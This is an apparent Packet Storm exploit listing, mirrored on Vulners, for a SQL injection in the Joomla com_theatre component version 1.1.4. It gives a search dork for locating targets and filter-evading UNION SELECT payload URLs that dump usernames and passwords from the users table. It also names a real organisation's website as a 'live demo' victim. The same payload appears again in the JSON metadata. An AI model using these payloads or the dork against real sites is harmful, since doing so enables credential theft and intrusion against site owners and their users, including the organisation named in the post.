Search...

Joomla Threate 1.1.4 SQL Injection

2016-07-10T00:00:00

ID PACKETSTORM:137843
Type packetstorm
Reporter xBADGIRL21
Modified 2016-07-10T00:00:00

Description

                                        
                                            `######################  
# Exploit Title : Joomla com_threate 1.1.4 SQL injection  
# Exploit Author : xBADGIRL21  
# Dork : index.php?option=com_threate  
# version: 1.1.4  
# Vendor Homepage : http://joomlic.com/  
# Tested on: [ Windows ]  
# skype:xbadgirl21  
# Date: 2016/07/09  
# video Proof : https://youtu.be/WXqrK7dqGaY  
######################  
# PoC:  
# [id=] Get Parameter Vulnerable To SQL  
#  
# http://server/index.php?option=com_theatre&view=show&id=[SQLi]  
#  
# Demo  
# http://server/index.php?option=com_theatre&view=show&id=36'  
#  
# http://server/index.php?option=com_theatre&view=show&id=-36  
/*!12345union*/ select  
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43  
#  
# http://server/index.php?option=com_theatre&view=show&id=-36  
/*!12345union*/ select  
1,2,3,4,5,6,7,8,9,10,/*!12345group_coNcat(username,0x3a,password)*/,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43  
from aur_users--  
#  
# Live Demo :  
# https://www.auroratheatre.org/  
#  
######################  
# Discovered by : xBADGIRL21  
# Greetz : All Mauritanien Hackers - NoWhere  
#######################  
`

JSON Vulners Source

Initial Source

{"hash": "c00178b3ae9dc9119013a1b2d7ecd5250beb96df5ac803ca51897f3cb0368e3b", "edition": 1, "references": [], "objectVersion": "1.2", "viewCount": 2, "type": "packetstorm", "description": "", "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/137843/Joomla-Threate-1.1.4-SQL-Injection.html", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "1ee5362a60c6ec03f86d4a9aafba9af6"}, {"key": "modified", "hash": "5d710bd0f383627aaac67e5bdcc7fa5e"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "5d710bd0f383627aaac67e5bdcc7fa5e"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "182369e088a70351af68e956335cbea7"}, {"key": "sourceData", "hash": "a885661052ce458b5bb2015fc6535ad2"}, {"key": "sourceHref", "hash": "2dae0e3a2194b6dfc0bf1bd18062eeb4"}, {"key": "title", "hash": "19947eef68b9ae5d28c4ef8bb3a870e6"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "published": "2016-07-10T00:00:00", "modified": "2016-07-10T00:00:00", "title": "Joomla Threate 1.1.4 SQL Injection", "cvelist": [], "sourceHref": "https://packetstormsecurity.com/files/download/137843/joomlathreate-sql.txt", "history": [], "reporter": "xBADGIRL21", "lastseen": "2016-11-03T10:26:38", "cvss": {"vector": "NONE", "score": 0.0}, "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2016-11-03T10:26:38"}, "dependencies": {"references": [], "modified": "2016-11-03T10:26:38"}, "vulnersScore": 0.4}, "sourceData": "`###################### \n# Exploit Title : Joomla com_threate 1.1.4 SQL injection \n# Exploit Author : xBADGIRL21 \n# Dork : index.php?option=com_threate \n# version: 1.1.4 \n# Vendor Homepage : http://joomlic.com/ \n# Tested on: [ Windows ] \n# skype:xbadgirl21 \n# Date: 2016/07/09 \n# video Proof : https://youtu.be/WXqrK7dqGaY \n###################### \n# PoC: \n# [id=] Get Parameter Vulnerable To SQL \n# \n# http://server/index.php?option=com_theatre&view=show&id=[SQLi] \n# \n# Demo \n# http://server/index.php?option=com_theatre&view=show&id=36' \n# \n# http://server/index.php?option=com_theatre&view=show&id=-36 \n/*!12345union*/ select \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 \n# \n# http://server/index.php?option=com_theatre&view=show&id=-36 \n/*!12345union*/ select \n1,2,3,4,5,6,7,8,9,10,/*!12345group_coNcat(username,0x3a,password)*/,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 \nfrom aur_users-- \n# \n# Live Demo : \n# https://www.auroratheatre.org/ \n# \n###################### \n# Discovered by : xBADGIRL21 \n# Greetz : All Mauritanien Hackers - NoWhere \n####################### \n`\n", "id": "PACKETSTORM:137843"}